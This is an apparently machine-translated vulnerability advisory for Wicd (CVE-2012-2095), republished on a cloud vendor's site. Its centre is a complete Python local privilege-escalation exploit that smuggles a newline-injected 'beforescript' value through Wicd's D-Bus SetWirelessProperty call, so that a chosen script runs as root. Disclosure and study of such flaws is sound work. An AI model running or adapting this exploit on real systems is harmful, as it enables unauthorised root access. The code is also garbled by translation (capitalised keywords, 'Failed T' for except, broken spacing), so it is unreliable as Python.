Wicd 'setwirelessproperty () 'Local Privilege Escalation Vulnerability

Source: Internet
Author: User
Tags nets

Release date:
Updated on:

Affected Systems:
Wicd 1.7.1 ~ B3-4
Wicd 1.7.1 ~ B3-3
Wicd 1.5.9
Wicd 1.5.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52987
Cve id: CVE-2012-2095

Wicd is an open-source wired and wireless network manager for Linux.

Wicd has a local privilege escalation vulnerability in the input verification of the 'setwirelessproperty () 'function. Attackers can access the allow interface to execute arbitrary code using the superuser privilege.

<* Source: anonymous
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Anonymous () provides the following test methods:

#! /Usr/bin/python
# Wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
# For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
Import sys
Import OS
Import time
Import getopt

Try: from wicd import dbusmanager
Failed T: print "[!] WICD Error: libraries are not available. Is WICD installed? "; Sys. exit (0)

Class Error (Exception ):
Def _ init _ (self, error ):
Self. errorStr = error

Def _ str _ (self ):
Return repr (self. errorStr)

Class Wicd ():
Wireless = None
Daemon = None
VersionString = None
Def _ init _ (self ):
Try:
Dbusmanager. connect_to_manager ()
DbusInterfaces = dbusmanager. get_dbus_ifaces ()
Self. wireless = dbusInterfaces ["wireless"]
Self. daemon = dbusInterfaces ["daemon"]
Except t:
Raise Error ("Daemon is not running ")
Self. versionString = self. daemon. Hello ()

Def versionLessThan (self, version ):
If int (self. versionString. replace (".", "") <= version:
Return True
Else:
Return False

Class Exploit ():

Def _ init _ (self, wicd, scriptPath ):
Self. wicd = wicd
Self. scriptPath = scriptPath

Def getNets (self ):
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
While nets <1:
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
For net in range (nets ):
Yield net

Def exploit (self ):

For net in self. getNets (): pass # Priming scan.

Try:
Self. wicd. wireless. SetWirelessProperty (0, "beforescript =" + self. scriptPath + "\ nrooted", "true ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")

Try:
Self. wicd. wireless. SaveWirelessNetworkProperty (0, "beforescript =" + self. scriptPath + "\ nrooted ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")

PropertyKey = 'bssid' # cocould be essid, or any other identifiable wireless property
VulnIdentifier = self. wicd. wireless. GetWirelessProperty (0, propertyKey)

# TODO: Does this need a try construct?
Self. wicd. wireless. ReloadConfig ()

For net in self. getNets (): # Implicit, but required re-scan.
If self. wicd. wireless. GetWirelessProperty (net, propertyKey) = vulnIdentifier:
Self. wicd. wireless. ConnectWireless (net)
Return True
Raise Error ("Unable to exploit (Lost the network we were using )")

Def usage ():
Print "[!] Usage :"
Print "(-h, -- help ):"
Print "Print this message ."
Print "(-- scriptPath =): Required, executable to run as root ."
Print "-- scriptPath =/some/path/to/executable. sh"

Def main ():
Print "[$] WICD = <1.7.0Day"
Try:
Opts, args = getopt. getopt (sys. argv [1:], "h", ["help", "scriptPath ="])
Counter t getopt. GetoptError, err:
# Print help information and exit:
Print '[!] Parameter error: '+ str (err) # Will print something like "option-a not recognized"
Usage ()
Sys. exit (0)

ScriptPath = None

For opt, arg in opts:
If opt in ("-h", "-- help "):
Usage ()
Sys. exit (0)
Elif opt = "-- scriptPath ":
ScriptPath = arg
Else:
# I wocould be assuming to say we'll never get here.
Print "[!] Parameter error ."
Usage ()
Sys. exit (0)

If not scriptPath:
Print "[!] Parameter error: scriptPath not set ."
Usage ()
Sys. exit (0)

Try:
Wicd = Wicd ()
Failed T Error as error:
Print "[!] WICD Error: % s "% (error. errorStr)
Exit (0)
Print "[*] WICD Connection Initialized! (Version: % s) "% (wicd. versionString)

If not wicd. versionLessThan (171 ):
Print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow ."

Exploit = Exploit (wicd, scriptPath)

Print "[*] Attempting to exploit :"

Try:
Exploit. exploit ()
Failed T Error as error:
Print "[!] Exploit Error: % s "% (error. errorStr)
Exit (0)
Print "[*] Exploit appears to have worked ."

# Standard boilerplate to call the main () function to begin
# The program.
If _ name __= = '_ main __':
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Wicd
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://wicd.net/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.